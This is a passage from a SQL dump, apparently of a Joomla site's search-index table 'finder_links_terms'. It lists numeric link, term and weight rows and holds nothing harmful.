(252, 12838, 0.93331),
(259, 12838, 0.93331),
(260, 12838, 0.93331),
(265, 12838, 0.93331),
(266, 12838, 0.93331),
(233, 12904, 0.04669),
(244, 12904, 0.04669),
(248, 12904, 0.04669),
(253, 12904, 0.04669),
(254, 12904, 0.04669),
(257, 12904, 0.04669),
(259, 12904, 0.04669),
(260, 12904, 0.04669),
(298, 12904, 0.04669),
(304, 12904, 0.04669),
(308, 12904, 0.04669),
(174, 12904, 0.09338),
(236, 12904, 0.09338),
(241, 12904, 0.09338),
(242, 12904, 0.09338),
(255, 12904, 0.09338),
(256, 12904, 0.09338),
(264, 12904, 0.09338),
(275, 12904, 0.09338),
(288, 12904, 0.09338),
(290, 12904, 0.09338),
(239, 12904, 0.14007),
(246, 12904, 0.14007),
(252, 12904, 0.18676),
(261, 12904, 0.23345),
(305, 12904, 0.23345),
(273, 12904, 0.28014),
(268, 12904, 0.32683),
(274, 12904, 0.32683),
(258, 12904, 0.42021),
(299, 12904, 0.42021),
(269, 12904, 0.65366),
(292, 12904, 0.74704),
(306, 12904, 0.74704),
(178, 12904, 2.24112),
(239, 12905, 0.91),
(252, 12905, 0.91),
(299, 12905, 0.91),
(174, 12907, 0.84),
(241, 12907, 0.84),
(252, 12907, 0.84),
(257, 12907, 0.84),
(259, 12907, 0.84),
(260, 12907, 0.84),
(269, 12907, 0.84),
(273, 12907, 0.84),
(305, 12907, 0.84),
(306, 12907, 2.52),
(178, 12907, 5.04),
(242, 12911, 0.84),
(252, 12911, 0.84),
(253, 12911, 0.84),
(258, 12911, 0.84),
(298, 12911, 0.84),
(305, 12911, 0.84),
(308, 12911, 0.84),
(261, 12911, 1.68),
(264, 12911, 1.68),
(252, 12912, 0.91),
(253, 12912, 0.91),
(261, 12912, 0.91),
(298, 12912, 0.91),
(305, 12912, 0.91),
(308, 12912, 0.91),
(238, 12913, 0.95669),
(252, 12913, 0.95669),
(257, 12913, 0.95669),
(263, 12913, 0.95669),
(288, 12913, 0.95669),
(252, 12922, 0.46669),
(268, 12922, 0.46669),
(247, 12925, 0.91),
(248, 12925, 0.91),
(252, 12925, 0.91),
(263, 12925, 0.91),
(273, 12925, 0.91),
(288, 12925, 0.91),
(247, 12926, 1.02669),
(248, 12926, 1.02669),
(252, 12926, 1.02669),
(263, 12926, 1.02669),
(273, 12926, 1.02669),
(288, 12926, 1.02669),
(178, 12927, 0.84),
(252, 12927, 0.84),
(257, 12927, 0.84),
(238, 12930, 0.86331),
(239, 12930, 0.86331),
(240, 12930, 0.86331),
(252, 12930, 0.86331),
(274, 12930, 0.86331),
(288, 12930, 0.86331),
(304, 12930, 0.86331),
(306, 12930, 0.86331),
(252, 12934, 0.86331),
(261, 12934, 0.86331),
(252, 12936, 1.02669),
(257, 12936, 1.02669),
(252, 12945, 0.88669),
(254, 12945, 0.88669),
(265, 12945, 0.88669),
(266, 12945, 0.88669),
(268, 12945, 0.88669),
(252, 12949, 1.00331),
(268, 12949, 1.00331),
(235, 12955, 0.88669),
(252, 12955, 0.88669),
(255, 12955, 0.88669),
(269, 12955, 0.88669),
(305, 12955, 0.88669),
(237, 12957, 0.95669),
(252, 12957, 0.95669),
(174, 12959, 0.88669),
(178, 12959, 0.88669),
(252, 12959, 0.88669),
(174, 12960, 0.98),
(252, 12960, 0.98),
(193, 12964, 0.86331),
(237, 12964, 0.86331),
(238, 12964, 0.86331),
(243, 12964, 0.86331),
(252, 12964, 0.86331),
(254, 12964, 0.86331),
(255, 12964, 0.86331),
(258, 12964, 0.86331),
(272, 12964, 0.86331),
(275, 12964, 0.86331),
(280, 12964, 0.86331),
(304, 12964, 0.86331),
(306, 12964, 1.72662),
(273, 12964, 3.82323),
(261, 12964, 5.17986),
(233, 12978, 0.18669),
(241, 12978, 0.18669),
(246, 12978, 0.18669),
(257, 12978, 0.18669),
(273, 12978, 0.18669),
(306, 12978, 0.18669),
(178, 12978, 0.37338),
(242, 12978, 0.37338),
(254, 12978, 0.37338),
(256, 12978, 0.37338),
(267, 12978, 0.37338),
(305, 12978, 0.37338),
(253, 12978, 0.56007),
(252, 12978, 0.74676),
(288, 12978, 1.57353),
(174, 12987, 0.18669),
(235, 12987, 0.18669),
(245, 12987, 0.18669),
(252, 12987, 0.18669),
(255, 12987, 0.18669),
(262, 12987, 0.18669),
(264, 12987, 0.18669),
(270, 12987, 0.18669),
(288, 12987, 0.18669),
(290, 12987, 0.18669),
(299, 12987, 0.18669),
(301, 12987, 0.18669),
(241, 12987, 0.37338),
(242, 12987, 0.37338),
(246, 12987, 0.37338),
(258, 12987, 0.37338),
(261, 12987, 0.37338),
(304, 12987, 0.37338),
(243, 12987, 0.56007),
(244, 12987, 0.56007),
(257, 12987, 0.56007),
(239, 12987, 0.74676),
(240, 12987, 0.93345),
(247, 12987, 0.93345),
(306, 12987, 0.93345),
(235, 12988, 0.91),
(243, 12988, 0.91),
(244, 12988, 0.91),
(246, 12988, 0.91),
(247, 12988, 0.91),
(252, 12988, 0.91),
(262, 12988, 0.91),
(264, 12988, 0.91),
(288, 12988, 0.91),
(290, 12988, 0.91),
(299, 12988, 0.91),
(235, 13091, 0.37331),
(247, 13091, 0.74662),
(252, 13091, 6.02629),
(247, 13096, 0.95669),
(252, 13096, 1.91338),
(235, 13101, 1.00331),
(252, 13101, 2.00662),
(265, 13105, 0.32669),
(266, 13105, 0.32669),
(252, 13105, 0.98007),
(252, 13106, 0.95669),
(265, 13106, 0.95669),
(266, 13106, 0.95669),
(237, 13111, 0.28),
(238, 13111, 0.28),
(241, 13111, 0.28),
(243, 13111, 0.28),
(244, 13111, 0.28),
(245, 13111, 0.28),
(254, 13111, 0.28),
(257, 13111, 0.28),
(258, 13111, 0.28),
(262, 13111, 0.28),
(267, 13111, 0.28),
(270, 13111, 0.28),
(275, 13111, 0.28),
(288, 13111, 0.28),
(290, 13111, 0.28),
(298, 13111, 0.28),
(301, 13111, 0.28),
(305, 13111, 0.28),
(308, 13111, 0.28),
(193, 13111, 0.56),
(240, 13111, 0.56),
(246, 13111, 0.56),
(249, 13111, 0.56),
(255, 13111, 0.56),
(259, 13111, 0.56),
(260, 13111, 0.56),
(269, 13111, 0.56),
(272, 13111, 0.56),
(274, 13111, 0.56),
(280, 13111, 0.56),
(299, 13111, 0.56),
(239, 13111, 0.84),
(248, 13111, 0.84),
(304, 13111, 0.84),
(174, 13111, 1.12),
(252, 13111, 1.12),
(263, 13111, 1.12),
(292, 13111, 1.4),
(242, 13111, 1.68),
(306, 13111, 1.68),
(240, 13118, 0.93331),
(252, 13118, 0.93331),
(239, 13120, 0.91),
(252, 13120, 0.91),
(233, 13122, 0.23331),
(236, 13122, 0.23331),
(238, 13122, 0.23331),
(240, 13122, 0.23331),
(243, 13122, 0.23331),
(252, 13122, 0.23331),
(254, 13122, 0.23331),
(272, 13122, 0.23331),
(274, 13122, 0.23331),
(280, 13122, 0.23331),
(292, 13122, 0.23331),
(305, 13122, 0.23331),
(193, 13122, 0.46662),
(239, 13122, 0.46662),
(257, 13122, 0.46662),
(275, 13122, 0.46662),
(259, 13122, 0.69993),
(260, 13122, 0.69993),
(288, 13122, 0.69993),
(306, 13122, 0.69993),
(304, 13122, 0.93324),
(253, 13122, 5.59944),
(233, 13123, 0.88669),
(238, 13123, 0.88669),
(239, 13123, 0.88669),
(240, 13123, 0.88669),
(243, 13123, 0.88669),
(252, 13123, 0.88669),
(257, 13123, 0.88669),
(272, 13123, 0.88669),
(274, 13123, 0.88669),
(275, 13123, 0.88669),
(280, 13123, 0.88669),
(305, 13123, 0.88669),
(306, 13123, 0.88669),
(288, 13123, 1.77338),
(259, 13123, 2.66007),
(260, 13123, 2.66007),
(174, 13125, 0.28),
(252, 13125, 0.28),
(262, 13125, 0.28),
(270, 13125, 0.28),
(273, 13125, 0.28),
(292, 13125, 0.28),
(301, 13125, 0.28),
(193, 13132, 0.37331),
(240, 13132, 0.37331),
(252, 13132, 0.37331),
(254, 13132, 0.37331),
(265, 13132, 0.37331),
(266, 13132, 0.37331),
(306, 13132, 0.37331),
(236, 13132, 0.90661),
(193, 13133, 0.98),
(252, 13133, 0.98),
(254, 13133, 0.98),
(265, 13133, 0.98),
(266, 13133, 0.98),
(306, 13133, 0.98),
(236, 13133, 2.38),
(252, 13134, 1.07331),
(265, 13134, 1.07331),
(266, 13134, 1.07331),
(252, 13135, 0.37331),
(254, 13135, 0.37331),
(243, 13135, 0.74662),
(193, 13138, 0.32669),
(240, 13138, 0.32669),
(242, 13138, 0.32669),
(252, 13138, 0.32669),
(257, 13138, 0.32669),
(238, 16134, 0.18669),
(243, 16134, 0.18669),
(245, 16134, 0.18669),
(261, 16134, 0.18669),
(267, 16134, 0.18669),
(292, 16134, 0.18669),
(298, 16134, 0.18669),
(299, 16134, 0.18669),
(308, 16134, 0.18669),
(247, 16134, 0.37338),
(254, 16134, 0.37338),
(290, 16134, 0.37338),
(306, 16134, 0.37338),
(268, 16134, 0.56007),
(238, 16135, 0.88669),
(243, 16135, 0.88669),
(261, 16135, 0.88669),
(292, 16135, 0.88669),
(298, 16135, 0.88669),
(299, 16135, 0.88669),
(306, 16135, 0.88669),
(308, 16135, 0.88669),
(247, 16135, 1.77338),
(254, 16135, 1.77338),
(290, 16135, 1.77338),
(268, 16135, 2.66007),
(238, 16468, 0.42),
(240, 16468, 0.42),
(247, 16468, 0.42),
(298, 16468, 0.42),
(299, 16468, 0.42),
(308, 16468, 0.42),
(306, 16468, 0.84),
(233, 16737, 0.18669),
(238, 16737, 0.18669),
(239, 16737, 0.18669),
(242, 16737, 0.18669),
(244, 16737, 0.18669),
(246, 16737, 0.18669),
(265, 16737, 0.18669),
(266, 16737, 0.18669),
(268, 16737, 0.18669),
(272, 16737, 0.18669),
(280, 16737, 0.18669),
(287, 16737, 0.18669),
(299, 16737, 0.18669),
(304, 16737, 0.18669),
(240, 16737, 0.37338),
(256, 16737, 0.37338),
(267, 16737, 0.37338),
(168, 16737, 1.12014),
(174, 16737, 2.61366),
(233, 16740, 0.28),
(243, 16740, 0.28),
(259, 16740, 0.28),
(260, 16740, 0.28),
(265, 16740, 0.28),
(266, 16740, 0.28),
(267, 16740, 0.28),
(288, 16740, 0.28),
(299, 16740, 0.28),
(44, 16740, 0.56),
(193, 16740, 0.84),
(240, 16740, 0.84),
(174, 16740, 1.12),
(168, 16740, 2.16),
(193, 16749, 0.37331),
(242, 16749, 0.37331),
(244, 16749, 0.37331),
(245, 16749, 0.37331),
(290, 16749, 0.37331),
(298, 16749, 0.37331),
(299, 16749, 0.37331),
(308, 16749, 0.37331),
(267, 16749, 0.74662),
(257, 16749, 4.85303),
(193, 16750, 0.95669),
(242, 16750, 0.95669),
(244, 16750, 0.95669),
(298, 16750, 0.95669),
(299, 16750, 0.95669),
(308, 16750, 0.95669),
(267, 16750, 1.91338),
(257, 16750, 7.65352),
(178, 20956, 0.32669),
(233, 20956, 0.32669),
(236, 20956, 0.32669),
(259, 20956, 0.65338),
(260, 20956, 0.65338),
(178, 20959, 0.28),
(233, 20959, 0.28),
(236, 20959, 0.28),
(241, 20959, 0.28),
(258, 20959, 0.28),
(275, 20959, 0.28),
(233, 20962, 0.51331),
(268, 20962, 0.51331),
(233, 20965, 0.32669),
(249, 20965, 0.32669),
(304, 20965, 0.32669),
(242, 20965, 0.65338),
(268, 20965, 0.65338),
(239, 20965, 0.98007),
(240, 20965, 0.98007),
(261, 20965, 0.98007),
(233, 20970, 0.91),
(253, 20970, 0.91),
(257, 20970, 1.82),
(233, 20992, 0.91),
(242, 20992, 0.91),
(254, 20992, 0.91),
(239, 20992, 1.82),
(240, 20992, 1.82),
(233, 20994, 0.18669),
(239, 20994, 0.18669),
(254, 20994, 0.18669),
(263, 20994, 0.18669),
(304, 20994, 0.18669),
(233, 21006, 0.95669),
(244, 21006, 0.95669),
(253, 21006, 0.95669),
(174, 21085, 0.77),
(233, 21085, 0.77),
(246, 21085, 0.77),
(248, 21085, 0.77),
(255, 21085, 0.77),
(274, 21085, 0.77),
(168, 21087, 0.81669),
(233, 21087, 0.81669),
(235, 21087, 0.81669),
(244, 21087, 0.81669),
(261, 21087, 0.81669),
(292, 21087, 0.81669),
(304, 21087, 0.81669),
(233, 21089, 0.84),
(235, 21089, 0.84),
(237, 21089, 0.84),
(243, 21089, 0.84),
(253, 21089, 0.84),
(193, 21094, 0.79331),
(233, 21094, 0.79331),
(248, 21094, 0.79331),
(253, 21094, 0.79331),
(274, 21094, 0.79331),
(290, 21094, 0.79331),
(292, 21094, 0.79331),
(298, 21094, 0.79331),
(306, 21094, 0.79331),
(308, 21094, 0.79331),
(262, 21094, 1.58662),
(304, 21094, 1.58662),
(239, 21094, 1.92661),
(240, 21094, 2.71992),
(242, 21094, 5.09985),
(233, 21096, 0.98),
(238, 21096, 0.98),
(275, 21096, 0.98),
(288, 21096, 0.98),
(259, 21096, 2.94),
(260, 21096, 2.94),
(242, 21097, 0.93331),
(256, 21097, 0.93331),
(233, 21097, 2.79993),
(239, 21097, 3.73324),
(233, 21101, 0.84),
(262, 21101, 0.84),
(272, 21101, 0.84),
(280, 21101, 0.84),
(233, 21102, 0.93331),
(262, 21102, 0.93331),
(233, 21103, 0.88669),
(241, 21103, 0.88669),
(257, 21103, 0.88669),
(304, 21103, 0.88669),
(306, 21103, 0.88669),
(233, 21104, 0.95669),
(241, 21104, 0.95669),
(304, 21104, 0.95669),
(306, 21104, 0.95669),
(233, 21110, 0.91),
(242, 21110, 0.91),
(233, 21111, 0.98),
(242, 21111, 0.98),
(233, 21177, 0.46669),
(265, 21177, 0.46669),
(266, 21177, 0.46669),
(287, 21177, 0.46669),
(288, 21177, 0.46669),
(233, 21181, 0.23331),
(236, 21181, 0.23331),
(245, 21181, 0.23331),
(258, 21181, 0.23331),
(274, 21181, 0.23331),
(242, 21181, 0.46662),
(256, 21181, 0.46662),
(288, 21181, 0.46662),
(292, 21181, 0.46662),
(233, 21182, 0.88669),
(256, 21182, 1.77338),
(292, 21182, 1.77338),
(168, 21184, 0.88669),
(233, 21184, 0.88669),
(240, 21184, 0.88669),
(244, 21184, 0.88669),
(272, 21184, 0.88669),
(280, 21184, 0.88669),
(304, 21184, 0.88669),
(174, 21184, 7.09352),
(233, 21188, 0.32669),
(261, 21188, 0.32669),
(268, 21188, 0.32669),
(240, 21188, 0.65338),
(262, 21188, 0.98007),
(233, 21189, 0.95669),
(240, 21189, 0.95669),
(265, 21191, 0.32669),
(266, 21191, 0.32669),
(233, 21191, 0.65338),
(264, 21191, 1.63345),
(235, 23256, 0.18669),
(265, 23256, 0.18669),
(266, 23256, 0.18669),
(274, 23256, 0.18669),
(299, 23256, 0.18669),
(304, 23256, 0.18669),
(236, 23256, 0.37338),
(236, 23259, 0.37331),
(241, 23259, 0.37331),
(263, 23259, 0.37331),
(299, 23259, 0.37331),
(305, 23259, 0.37331),
(242, 23265, 0.91),
(299, 23265, 0.91),
(174, 23269, 0.18669),
(249, 23269, 0.18669),
(275, 23269, 0.18669),
(306, 23269, 0.18669),
(299, 23269, 0.37338),
(267, 23275, 0.88669),
(299, 23275, 0.88669),
(235, 23277, 0.84),
(241, 23277, 0.84),
(261, 23277, 0.84),
(240, 23277, 1.68),
(243, 23277, 1.68),
(249, 23277, 1.68),
(299, 23277, 5.88),
(168, 23288, 0.14),
(193, 23288, 0.14),
(264, 23288, 0.14),
(299, 23288, 0.14),
(299, 23306, 0.37331),
(253, 23306, 0.74662),
(193, 23306, 1.11993),
(174, 23312, 0.28),
(299, 23312, 0.28),
(193, 23318, 0.42),
(237, 23318, 0.42),
(239, 23318, 0.42),
(240, 23318, 0.42),
(242, 23318, 0.42),
(254, 23318, 0.42),
(264, 23318, 0.42),
(295, 23318, 0.42),
(299, 23318, 0.42),
(244, 23318, 1.26),
(174, 23321, 0.81669),
(236, 23321, 0.81669);
INSERT INTO `y57u5_finder_links_terms8` (`link_id`, `term_id`, `weight`) VALUES
(239, 23321, 0.81669),
(287, 23321, 0.81669),
(288, 23321, 0.81669),
(299, 23321, 0.81669),
(305, 23321, 0.81669),
(306, 23321, 0.81669),
(240, 23321, 1.63338),
(242, 23321, 1.63338),
(299, 23324, 0.84),
(306, 23324, 0.84),
(178, 23324, 1.68),
(240, 23332, 0.88669),
(243, 23332, 0.88669),
(257, 23332, 0.88669),
(259, 23332, 0.88669),
(260, 23332, 0.88669),
(264, 23332, 0.88669),
(269, 23332, 0.88669),
(270, 23332, 0.88669),
(287, 23332, 0.88669),
(292, 23332, 0.88669),
(299, 23332, 0.88669),
(301, 23332, 0.88669),
(305, 23332, 0.88669),
(193, 23332, 1.77338),
(246, 23332, 1.77338),
(272, 23332, 1.77338),
(280, 23332, 1.77338),
(168, 23332, 3.04008),
(263, 23332, 3.54676),
(306, 23332, 3.54676),
(174, 23332, 6.20683),
(236, 23337, 0.86331),
(299, 23337, 0.86331),
(299, 23339, 0.32669),
(246, 23339, 0.65338),
(257, 23347, 0.88669),
(299, 23347, 1.77338),
(236, 23350, 0.88669),
(238, 23350, 0.88669),
(240, 23350, 0.88669),
(244, 23350, 0.88669),
(254, 23350, 0.88669),
(255, 23350, 0.88669),
(262, 23350, 0.88669),
(264, 23350, 0.88669),
(274, 23350, 0.88669),
(275, 23350, 0.88669),
(292, 23350, 0.88669),
(306, 23350, 0.88669),
(193, 23350, 1.77338),
(242, 23350, 1.77338),
(257, 23350, 1.77338),
(299, 23350, 1.77338),
(235, 23350, 2.66007),
(178, 23350, 4.43345),
(235, 23351, 1.00331),
(299, 23351, 1.00331),
(244, 23352, 1.09669),
(299, 23352, 1.09669),
(254, 23476, 0.79331),
(261, 23476, 0.79331),
(273, 23476, 0.79331),
(290, 23476, 0.79331),
(292, 23476, 0.79331),
(299, 23476, 0.79331),
(306, 23476, 0.79331),
(178, 23476, 10.313),
(299, 23478, 0.84),
(178, 23478, 1.68),
(178, 23479, 0.91),
(299, 23479, 0.91),
(239, 23484, 0.84),
(288, 23484, 0.84),
(299, 23484, 0.84),
(239, 23490, 0.14),
(242, 23490, 0.14),
(268, 23490, 0.14),
(299, 23490, 0.14),
(306, 23490, 0.14),
(269, 23499, 0.91),
(299, 23499, 0.91),
(193, 23500, 0.09331),
(242, 23500, 0.09331),
(292, 23500, 0.09331),
(299, 23500, 0.09331),
(235, 23506, 0.84),
(244, 23506, 0.84),
(246, 23506, 0.84),
(290, 23506, 0.84),
(299, 23506, 0.84),
(178, 23508, 0.91),
(269, 23508, 0.91),
(299, 23508, 0.91),
(236, 23508, 1.82),
(193, 23512, 0.88669),
(244, 23512, 0.88669),
(256, 23512, 0.88669),
(295, 23512, 0.88669),
(299, 23512, 0.88669),
(305, 23512, 0.88669),
(178, 23512, 12.4137),
(239, 23513, 0.81669),
(275, 23513, 0.81669),
(178, 23513, 4.08345),
(245, 23515, 0.95669),
(256, 23515, 0.95669),
(299, 23515, 0.95669),
(174, 23525, 0.88669),
(237, 23525, 0.88669),
(240, 23525, 0.88669),
(241, 23525, 0.88669),
(244, 23525, 0.88669),
(253, 23525, 0.88669),
(256, 23525, 0.88669),
(272, 23525, 0.88669),
(274, 23525, 0.88669),
(280, 23525, 0.88669),
(288, 23525, 0.88669),
(299, 23525, 0.88669),
(304, 23525, 0.88669),
(305, 23525, 1.77338),
(240, 23526, 1.02669),
(299, 23526, 1.02669),
(305, 23526, 1.02669),
(193, 23527, 0.91),
(256, 23527, 0.91),
(257, 23527, 0.91),
(269, 23527, 0.91),
(290, 23527, 0.91),
(299, 23527, 0.91),
(272, 23527, 1.82),
(280, 23527, 1.82),
(168, 23529, 0.56),
(193, 23529, 0.56),
(244, 23529, 0.56),
(245, 23529, 0.56),
(246, 23529, 0.56),
(247, 23529, 0.56),
(248, 23529, 0.56),
(299, 23529, 0.56),
(193, 23532, 0.37331),
(257, 23532, 0.37331),
(264, 23532, 0.37331),
(299, 23532, 0.37331),
(242, 23545, 0.84),
(288, 23545, 0.84),
(304, 23545, 0.84),
(239, 23545, 1.68),
(299, 23545, 1.68),
(242, 23547, 0.91),
(288, 23547, 0.91),
(299, 23547, 0.91),
(304, 23547, 0.91),
(241, 23552, 0.28),
(243, 23552, 0.28),
(292, 23552, 0.28),
(294, 23552, 0.28),
(299, 23552, 0.28),
(168, 23552, 0.56),
(247, 23552, 0.84),
(258, 23552, 0.84),
(178, 23552, 1.4),
(174, 23555, 0.28),
(268, 23555, 0.28),
(272, 23555, 0.28),
(280, 23555, 0.28),
(299, 23555, 0.28),
(299, 23558, 0.88669),
(242, 23558, 1.77338),
(299, 23559, 0.95669),
(242, 23559, 1.91338),
(238, 23605, 0.32669),
(299, 23605, 0.32669),
(239, 23605, 0.65338),
(247, 23608, 1.00331),
(299, 23608, 1.00331),
(261, 23843, 0.28),
(299, 23843, 0.28),
(261, 23857, 0.37331),
(275, 23857, 0.37331),
(267, 23857, 0.74662),
(242, 23857, 2.23986),
(288, 23857, 2.23986),
(299, 23857, 2.23986),
(299, 23860, 1.19),
(242, 23860, 4.76),
(299, 23861, 1.30669),
(242, 23861, 3.92007),
(242, 23869, 0.42),
(292, 23869, 0.42),
(299, 23869, 0.42),
(261, 23879, 0.37331),
(299, 23879, 0.37331),
(178, 23879, 0.90661),
(242, 23882, 1.05),
(244, 23882, 1.05),
(267, 23882, 1.05),
(299, 23882, 1.05),
(257, 23882, 2.1),
(193, 25034, 0.91),
(253, 25034, 0.91),
(256, 25034, 0.91),
(265, 25034, 0.91),
(266, 25034, 0.91),
(267, 25034, 0.91),
(288, 25034, 0.91),
(298, 25034, 0.91),
(308, 25034, 0.91),
(265, 25035, 1.02669),
(266, 25035, 1.02669),
(267, 25035, 1.02669),
(298, 25035, 1.02669),
(308, 25035, 1.02669),
(238, 25036, 0.91),
(298, 25036, 0.91),
(308, 25036, 0.91),
(243, 25056, 0.23331),
(245, 25056, 0.23331),
(268, 25056, 0.23331),
(298, 25056, 0.23331),
(308, 25056, 0.23331),
(256, 25062, 0.32669),
(304, 25062, 0.32669),
(44, 25062, 0.65338),
(298, 25062, 2.28683),
(308, 25062, 2.28683),
(178, 25077, 0.18669),
(235, 25077, 0.18669),
(239, 25077, 0.18669),
(241, 25077, 0.18669),
(242, 25077, 0.18669),
(259, 25077, 0.18669),
(260, 25077, 0.18669),
(268, 25077, 0.18669),
(272, 25077, 0.18669),
(280, 25077, 0.18669),
(298, 25077, 0.18669),
(308, 25077, 0.18669),
(193, 25077, 0.37338),
(240, 25077, 0.37338),
(255, 25077, 0.37338),
(269, 25077, 0.37338),
(306, 25077, 0.37338),
(298, 25093, 0.23331),
(304, 25093, 0.23331),
(308, 25093, 0.23331),
(178, 25093, 0.93324),
(193, 25093, 0.93324),
(238, 25093, 2.3331),
(193, 25094, 0.88669),
(298, 25094, 0.88669),
(304, 25094, 0.88669),
(308, 25094, 0.88669),
(178, 25094, 2.66007),
(238, 25094, 5.32014),
(193, 25095, 0.98),
(298, 25095, 0.98),
(304, 25095, 0.98),
(308, 25095, 0.98),
(298, 25132, 0.91),
(308, 25132, 0.91),
(242, 25132, 1.82),
(193, 25140, 1.05),
(298, 25140, 1.05),
(308, 25140, 1.05),
(238, 25143, 0.84),
(242, 25143, 0.84),
(246, 25143, 0.84),
(272, 25143, 0.84),
(280, 25143, 0.84),
(298, 25143, 0.84),
(308, 25143, 0.84),
(305, 25143, 1.68),
(193, 25145, 0.37331),
(304, 25145, 0.37331),
(298, 25145, 2.02654),
(308, 25145, 2.02654),
(246, 25154, 0.32669),
(298, 25154, 0.32669),
(304, 25154, 0.32669),
(308, 25154, 0.32669),
(267, 25167, 0.95669),
(298, 25167, 0.95669),
(308, 25167, 0.95669),
(267, 25168, 1.07331),
(298, 25168, 1.07331),
(308, 25168, 1.07331),
(255, 25266, 0.32669),
(308, 25266, 0.32669),
(304, 25266, 0.98007),
(238, 25269, 0.95669),
(255, 25269, 0.95669),
(269, 25269, 0.95669),
(290, 25269, 0.95669),
(298, 25269, 0.95669),
(304, 25269, 0.95669),
(306, 25269, 0.95669),
(308, 25269, 0.95669),
(248, 25269, 1.91338),
(238, 25271, 0.37331),
(269, 25271, 0.37331),
(298, 25271, 0.37331),
(308, 25271, 0.37331),
(241, 25271, 0.74662),
(298, 25274, 0.28),
(308, 25274, 0.28),
(178, 25274, 0.56),
(193, 25277, 1.05),
(267, 25277, 1.05),
(298, 25277, 1.05),
(308, 25277, 1.05),
(257, 25277, 6.3),
(298, 25278, 0.37331),
(308, 25278, 0.37331),
(244, 25278, 1.49324),
(244, 25279, 0.98),
(298, 25279, 0.98),
(308, 25279, 0.98),
(256, 25924, 0.95669),
(44, 25924, 1.91338),
(44, 25925, 2.24),
(44, 25926, 0.8),
(45, 25926, 0.8),
(46, 25926, 0.8),
(47, 25926, 0.8),
(48, 25926, 0.8),
(49, 25926, 0.8),
(50, 25926, 0.8),
(44, 25927, 2.5334),
(45, 25927, 2.5334),
(46, 25927, 2.5334),
(47, 25927, 2.5334),
(48, 25927, 2.5334),
(49, 25927, 2.5334),
(50, 25927, 2.5334),
(45, 25974, 2.5334),
(45, 25975, 2.6666),
(47, 26010, 4.44323),
(295, 26010, 10.1764),
(48, 26024, 1.44677),
(48, 26025, 4.75323),
(193, 28463, 0.84),
(239, 28463, 0.84),
(253, 28463, 0.84),
(258, 28463, 0.84),
(261, 28463, 0.84),
(259, 28463, 1.68),
(260, 28463, 1.68),
(265, 28463, 1.68),
(266, 28463, 1.68),
(193, 28505, 0.88669),
(253, 28505, 0.88669),
(193, 28506, 0.95669),
(253, 28506, 0.95669),
(193, 28509, 0.18669),
(239, 28509, 0.18669),
(242, 28509, 0.18669),
(253, 28509, 0.18669),
(254, 28509, 0.18669),
(304, 28509, 0.18669),
(238, 28509, 0.37338),
(240, 28509, 0.37338),
(306, 28509, 0.37338),
(237, 28509, 0.74676),
(193, 28761, 0.37331),
(238, 28761, 0.37331),
(240, 28761, 0.37331),
(242, 28761, 0.37331),
(253, 28761, 0.37331),
(262, 28761, 0.37331),
(267, 28761, 0.37331),
(247, 28761, 0.74662),
(254, 31652, 0.32669),
(290, 31652, 0.65338),
(193, 31652, 0.98007),
(168, 31690, 0.81669),
(193, 31690, 0.81669),
(249, 31690, 0.81669),
(254, 31690, 0.81669),
(261, 31690, 0.81669),
(306, 31690, 0.81669),
(267, 31690, 1.63338),
(305, 31690, 1.63338),
(193, 31723, 0.23331),
(254, 31723, 0.23331),
(193, 31855, 0.86331),
(244, 31855, 0.86331),
(255, 31855, 0.86331),
(264, 31855, 0.86331),
(235, 31855, 1.72662),
(193, 32071, 0.98),
(254, 32071, 0.98),
(259, 32071, 0.98),
(260, 32071, 0.98),
(193, 32119, 0.93331),
(254, 32119, 2.79993),
(236, 32136, 0.86331),
(243, 32136, 0.86331),
(262, 32136, 0.86331),
(264, 32136, 0.86331),
(268, 32136, 0.86331),
(193, 32136, 1.72662),
(239, 32136, 1.72662),
(242, 32136, 3.45324),
(193, 32140, 0.86331),
(235, 32140, 0.86331),
(238, 32140, 0.86331),
(240, 32140, 0.86331),
(241, 32140, 0.86331),
(243, 32140, 0.86331),
(257, 32140, 0.86331),
(262, 32140, 0.86331),
(270, 32140, 0.86331),
(273, 32140, 0.86331),
(301, 32140, 0.86331),
(306, 32140, 0.86331),
(265, 32140, 1.72662),
(266, 32140, 1.72662),
(239, 32173, 0.32669),
(241, 32173, 0.32669),
(242, 32173, 0.32669),
(246, 32173, 0.32669),
(248, 32173, 0.32669),
(272, 32173, 0.32669),
(275, 32173, 0.32669),
(280, 32173, 0.32669),
(288, 32173, 0.32669),
(236, 32173, 0.65338),
(243, 32173, 0.65338),
(261, 32173, 0.65338),
(274, 32173, 0.65338),
(306, 32173, 0.98007),
(193, 32173, 1.96014),
(193, 32186, 0.23331),
(238, 32186, 0.23331),
(240, 32186, 0.23331),
(241, 32186, 0.23331),
(254, 32186, 0.23331),
(264, 32186, 0.23331),
(288, 32186, 0.23331),
(305, 32186, 0.23331),
(306, 32186, 0.23331),
(242, 32186, 0.46662),
(193, 32470, 0.88669),
(254, 32470, 0.88669),
(275, 32470, 0.88669),
(193, 32520, 0.14),
(236, 32520, 0.14),
(237, 32520, 0.14),
(239, 32520, 0.14),
(240, 32520, 0.14),
(247, 32520, 0.14),
(264, 32520, 0.14),
(267, 32520, 0.14),
(268, 32520, 0.14),
(269, 32520, 0.14),
(292, 32520, 0.14),
(248, 32520, 0.28),
(306, 32520, 0.42),
(265, 32520, 0.56),
(266, 32520, 0.56),
(45, 36303, 0.56004),
(235, 36484, 0.42),
(242, 36484, 0.42),
(253, 36484, 0.42),
(262, 36484, 0.42),
(264, 36484, 0.42),
(265, 36484, 0.42),
(266, 36484, 0.42),
(174, 36484, 0.84),
(259, 36484, 0.84),
(260, 36484, 0.84),
(242, 36495, 0.93331),
(253, 36495, 0.93331),
(241, 36500, 0.91),
(253, 36500, 0.91),
(241, 36501, 0.98),
(253, 36501, 0.98),
(253, 36524, 0.32669),
(244, 36524, 0.65338),
(256, 36524, 1.8668),
(253, 36530, 0.18669),
(256, 36530, 0.18669),
(247, 36541, 0.98),
(253, 36541, 0.98),
(168, 36641, 0.84),
(178, 36641, 0.84),
(238, 36641, 0.84),
(243, 36641, 0.84),
(253, 36641, 0.84),
(257, 36641, 0.84),
(274, 36641, 0.84),
(304, 36641, 0.84),
(239, 36641, 1.68),
(242, 36641, 1.68),
(247, 36641, 1.68),
(253, 36646, 0.95669),
(274, 36646, 0.95669),
(292, 36646, 1.91338),
(178, 36647, 0.98),
(253, 36647, 0.98),
(253, 36648, 0.88669),
(273, 36648, 0.88669),
(239, 36648, 1.77338),
(306, 36648, 1.77338),
(235, 36650, 0.81669),
(243, 36650, 0.81669),
(253, 36650, 0.81669),
(253, 36655, 0.46669),
(273, 36655, 0.46669),
